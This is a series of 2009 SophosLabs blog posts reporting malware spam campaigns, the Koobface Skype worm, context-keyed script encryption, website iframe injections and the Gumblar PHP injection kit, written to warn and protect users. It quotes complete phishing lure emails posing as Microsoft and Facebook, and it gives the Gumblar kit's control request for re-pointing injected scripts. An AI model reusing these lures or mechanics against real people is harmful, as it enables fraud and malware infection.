SophosLabs blog

SophosLabs were today’s Macbook air winners according to the cyber criminals. We received loads of these congratulation emails on our spam traps today.  They were spamming out the malicious attachments which Sophos successfully detects as Troj/Agent-LNC.

The email was attached with a zip file called winner.zip ( Detected as Troj/SpefZp-A). Here’s the sample of the email.

The email pretends to be coming from Media Service and you can clearly see the typo in the email. All this proves that it’s a definite spam.

Sophos also proactively blocks the malware as Mal/FakeAV-AX.

Please don’t click on any such fake congratulation emails in your inbox or the junk folder. If you still ignore this warning and click on the attachment thinking you are a winner of Macbook air, you will be gifted with the malware.

Koobface started life compromising Twitter accounts. It then diversified to attack various social networking sites including Facebook, MySpace, Bebo, hi5, GeoCities, Friendster among the prominent ones.

Recently I came across what could possibly be the next iteration of Koobface, W32/Koobfa-O, which came with Skype hacking functionality and some additional promises for the future. The new variant of Koobface attacks Skype accounts on the compromised machine to get various pieces of information about the victim using the different Skype API commands. The following screenshot demonstrates a few:

W32/Koobfa-O collects information about the user such as HOMEPAGE, ABOUT, PHONE_MOBILE, PHONE_OFFICE, PHONE_HOME, CITY, COUNTRY, BIRTHDAY, FULLNAME, PSTN_BALANCE etc. The collected information is dumped into a file which is packed as a RAR archive and either emailed or uploaded to a remote server. The worm then logs on to Skype chat as the user and starts a conversation with friends online. In the body of the worm there are snippets of conversation in 18 different languages including some Asian languages. The following screenshot shows a snippet of available conversation items in English:

I initially expected that there might be some lexical analysis being done to talk somewhat intelligently with the person at the other end of the chat, but it seems the worm pastes conversation pieces fairly randomly. This will be because the worm supports conversation in 18 languages, and it is too complicated to do a lexical analysis for the different languages. It is easier to just randomly chat. The worm will also paste a link to a compromised domain in the chat conversation, visiting which will download W32/Koobfa-O.

W32/Koobfa-O also does something which promises upcoming functionality in the future.

Koobface already attacks Facebook and MySpace, so those two on the list are no big surprises. The list contains new additions: blogger.com, wikipedia.org, youtube.com, yahoo.com and google.com. The worm doesn’t do much except look to see if some information (possibly credentials) exists for these domains. But is this a promise for the future? Clearly as social networking and collaborative sites/tools multiply in number and become bigger, more malware will attempt to take advantage of them.

Malware authors and software-protectionists alike go to great lengths to obfuscate and contort their code in an attempt to hide or obscure its true nature [1,2]. The assumption being that it is difficult for human or machine to make sense of the code, extending analysis time and giving the bad guys a free run.

For the most part, such obfuscations (in particular JavaScript) are relatively easy to unravel because they are static transformations [3]. The more complex encrypted forms require some form of script emulator (or your browser of choice) and a skillfully inserted alert() instead of eval(), however a new form akin to the one-time-pad concept is now being deployed.

Script obfuscated and encrypted with contextual data

Such [quasi] one-time encryptors function by generating and encrypting the content on-demand while at the same time choosing a key which is a function of the download environment, such as the referer or the last modified time. When the script is rendered it has all the necessary information to correctly decode. However when that script is submitted by the customer for analysis, the environment has long been destroyed making the script nearly impossible to decode.

Thus examining the script on Friday 13th (13/11/2009) at 11:08:23 yields (poorly) decrypted content which does not render.

Script decoded with wrong key

yet behold, on (every) 47th second of the 7th day of each month the script correctly decodes revealing its secrets - here, deciding whether to serve a (quite likely malicious) PDF, or Flash element.

Correctly decoded given context

Static offline analysis of such scripts is easily thwarted, however any scanning engine which has access to the HTTP data stream should be able to cope since it has all the relevant contextual data required at the time of rendering.

Brute-forcing aside, the only real way to tackle this problem is to use “Just in time” detection (otherwise known as on-access), failing that, NoScript remains your best protection.

Today we have spotted a batch of messages arriving in our spam systems titled “Conflicker.B Infection Alert”. The message goes like this:

Dear Microsoft Customer,

Starting 12/11/2009 the ‘Conficker’ worm began infecting Microsoft customers unusually rapidly. Microsoft has been advised by your Internet provider that your network is infected.

To counteract further spread we advise removing the infection using an antispyware program. We are supplying all effected Windows Users with a free system scan in order to clean any files infected by the virus.

Please install attached file to start the scan. The process takes under a minute and will prevent your files from being compromised. We appreciate your prompt cooperation.

Regards,
Microsoft Windows Agent #2 (Hollis)
Microsoft Windows Computer Safety Division

The fact that the so-called antispyware program comes attached with the email is a good indication that something is not looking right.

When the attached program was executed, it did not start a “free system scan” as claimed, but instead it simply moved itself into other folders in the system and have set up itself to be automatically started on windows startup.

Not surprisingly, the attached file is detected by Sophos as Mal/FakeAV-AX and the email message has also been blocked.

This is another example of social engineering tricks employed by malware authors to capitalize on fears of the user to entice them into running malicious software.

As always with dealing with emails, think twice before running what came with the attachment.

Before everybody peruses the ‘net in search of their fish supper this cold and wet Friday night.* Stop!!

Do you have adequate protection?

For your Internet browsing?

Earlier this week SophosLabs spotted that the famous chip shop brand Harry Ramsden’s website had been haked by a malicious iframe. I codn’t believe it when I saw that the mootools.js script on the site is infected with Troj/Iframe-DF meaning that the website isn’t the plaice to visit.

The injected code is all mushed up though so the malicious script may be floundering.

The obfuscated iframe points to a haked site in Germany that when you go there redirects you to a fake Google site registered in the EU. Which triggers Troj/ObfJS-R.

I don’t want to carp on about the responsibilities of Web masters and Web hosters but they really have to protect their sites as well as tuna them up.

All this talk of fish’n'chips has made me hungry for a chip butty.

*Apologies for the puntastic tabloid style of this post but it is Friday :)

Readers may have noticed some of the recent rumours about new Gumblar-related activity (see for example here or here). The original Gumblar attack (May 2009) involved the mass-defacement of huge numbers of legitimate sites with a malicious script Sophos products blocked as Troj/JSRedir-R. The purpose of this was to infect users with a data-stealing Trojan known as Troj/Daonol-Fam.

The payload of the recent attacks looks similar, the malicious binaries now being detected as Mal/Daonol-A.

As with the previous wave of site defacements, it appears to be stolen FTP credentials that is driving the new attacks. These enable the attackers to upload malicious PHP scripts which can then be used to construct the attack. Contrary to the previous attacks, the payload is now also being hosted on compromised hosts, making the attacks more resilient.

At the end of last week, we managed to get hold of one of the key PHP script components being used by the attackers. Analysis of the script gives us some interesting insights into these attacks.

The PHP script can be used by the attackers to inject a malicious script into all suitable pages on the victim site. Files below ~200kB whose extension do not match any of the following are targeted (up to a maximum of 5 within any particular directory):

• .zip
• .rar
• .gz
• .jpg
• .gif
• .avi
• .mp3
• .wma
• .mpg
• .png
• .txt
• .swf
• .css
• .js
• .log
• .pdf
• .ppt
• .fla
• .as
• .tar

Some simple techniques are used to make the injected scripts mildly polymorphic (between each injected page). These include function/variable substitution and simple string obfuscation.

The purpose of the injected script is simple - adding a script element to the page which will cause the browser to load further malicious content from a remote server (hosted on another compromised site).

The PHP script makes it trivial for the attackers to change the redirection payload of the scripts that are injected into pages. Issuing a HTTP request to the PHP script with the desired target domain in the query string is all that is required. So, requesting http://compromised_site_A/path/gumblar.php?dom=compromised_site_B will result in:

• removal of any injected scripts previously added to suitable pages on compromised_site_A
• injection of new scripts, whose payload will be to load content from compromised_site_B

This makes the new wave of attacks more resilient to URL filtering. Sophos customers are protected - aside from detecting the payload as Mal/Daonol-A, pages injected with the redirection scripts are blocked as Troj/JSRedir-AE. Indications at this point are that a large volume of sites have been affected - the detection is already contributing to almost 4% of all web-based threats for the past 48 hours.

Additionally, detection for the malicious PHP scripts uploaded to compromised sites has been added as Troj/PHPMod-B. If you are a webmaster or hosting provider and encounter this detection, please let us know. It would be interesting to collect further samples of the PHP kits being used.

It has been a busy week so far for the writers of e-mail exploits and this Friday morning they continue to try to trick the public into installing their malware. The latest threat to fall into the Sophos spam traps purports to come from Facebook and requests the user to update their account agreement by unzipping and executing an attached file called agreement.exe.

Dear Facebook user,

Due to Facebook policy changes, all Facebook users must submit a new, updated account agreement, regardless of their original account start date.
Accounts that do not submit the updated account agreement by the deadline will have restricted.

Please unzip the attached file and run “agreement.exe” by double-clicking it.

Thanks,
The Facebook Team

Of course we all know that it is pure folly to unzip and run an unknown executable attached to an e-mail, however the implied threat of finding their access to Facebook restricted by ‘the deadline’, whenever that may be, is obviously severe enough to panic a number of the users of Facebook into falling for this trick.  

They really should think twice, by agreeing to install agreement.exe they will install a Trojan.

Sophos detects this threat as Troj/Dloadr-CWS.

Last week, SophosLabs released detection for OSX/LoseGame-A and following Symantec’s publishing detection (which they call OSX.Loosemaque) there has been some controversy about whether this is a game or malware (see 1, 2, 3).

From my point of view this is malware. Why?

1. The warning screen isn’t  multi-lingual if English isn’t your first language you will still recognize ‘PRESS ANY KEY TO CONTINUE’.
2. Even if English is your first language a child looking for games on the computer will not read the warning but press through to the game.



3. Would our corporate customers want this on their networks?

The concept behind OSX/LoseGame-A is ill conceived and it is likely to have malicious consequences not considered by the author.

In the past few weeks, the authors behind Zbot has been busy. Around October 12 we have seen the server upgrade spam with links. Later on the 14th we’ve seen the same campaign with the malware attached to similar-looking server upgrade notices. By the 22nd of October, the spam messages touts Outlook updates.

For a few days during the past week, the group has turned their attention to the Federal Deposit Insurance Corporation (FDIC), spamming out links to malware sites with the message below:

With the global economy as it is, notice of bank failures would certainly draw a lot of attention and irrational behavior. After all, thoughts of hard-earned money being gone forever is going to scare a lot of people. Of course, downloading the “personal FDIC insurance file” would give nothing but grief. The bank deposits are still safe, but the computer would probably get infected.

After the blast of FDIC messages, the Zbot authors turned to facebook as their latest platform to spread malware. However, they added a twist to it. The messages are well-crafted to look like a real Facebook message:

The message asks the user to update their facebook account. The new twist is that, when they get to the linked site, there is no link to download an executable yet. Instead, they’re shown with a fake Facebook login page:

Victims who have entered their facebook login would get their account details phished, probably for the purpose of spreading more malware. Since this is not a real facebook page, any random login info would bring you to this next page:

It is on this page where the malware author provides an executable for download. This file, updatetool.exe is a Zbot executable that is proactive detected as Mal/EncPk-LE.

With the creative social engineering that the Zbot authors have been using, users should be real careful when reading messages, whether it’s in an email or from a social network. Avoid clicking links directly, manually type the address to access the site, and not executing files would do a lot in protecting one’s computer.

Back in May, we posted some stats on the prevalence of Troj/JSRedir-R. Last week, I asked was Mal/Iframe-N: The next big threat?. Looking through our stats on malware hosted on websites this morning I saw that Mal/Iframe-N fifth in the overall stats for October.

Looking at the latter part of the month from the 21st (when the detection was published) onwards.

Mal/Iframe-N is clearly first and if the results are extrapolated for the whole month Mal/Iframe-N should have easily beat Mal/Iframe-F into second place!

Late last week, I downloaded:

• 2819 infected URIs infected with Mal/Iframe-N
• hosted on 2294 different domains
• with 163 different TLDs including:

.edu.in
.edu.tr
.edu.tw
.edu.ua
.ej.am
.eng.br
.es
.eu
.fi
.fr
.fr.cr
.ge
.go.th
.gov.br
.gov.pk
.gov.tr
.gr

I have had a few correspondences with other security researchers regarding this threat (see iframes are EVIL! Hate Zeus!) particularly with Unmask Parasites who has gone into more details of this type of threat (see 1, 2) who like me originally thought that the ‘onload’ attribute wasn’t legal in an iframe. Two things changed my mind:

1. Visiting an infected site on a goat machine.
2. The number of infected sites (>40, 000).

In someways the second fact is more persuasive as malware authors don’t tend do things for no reason.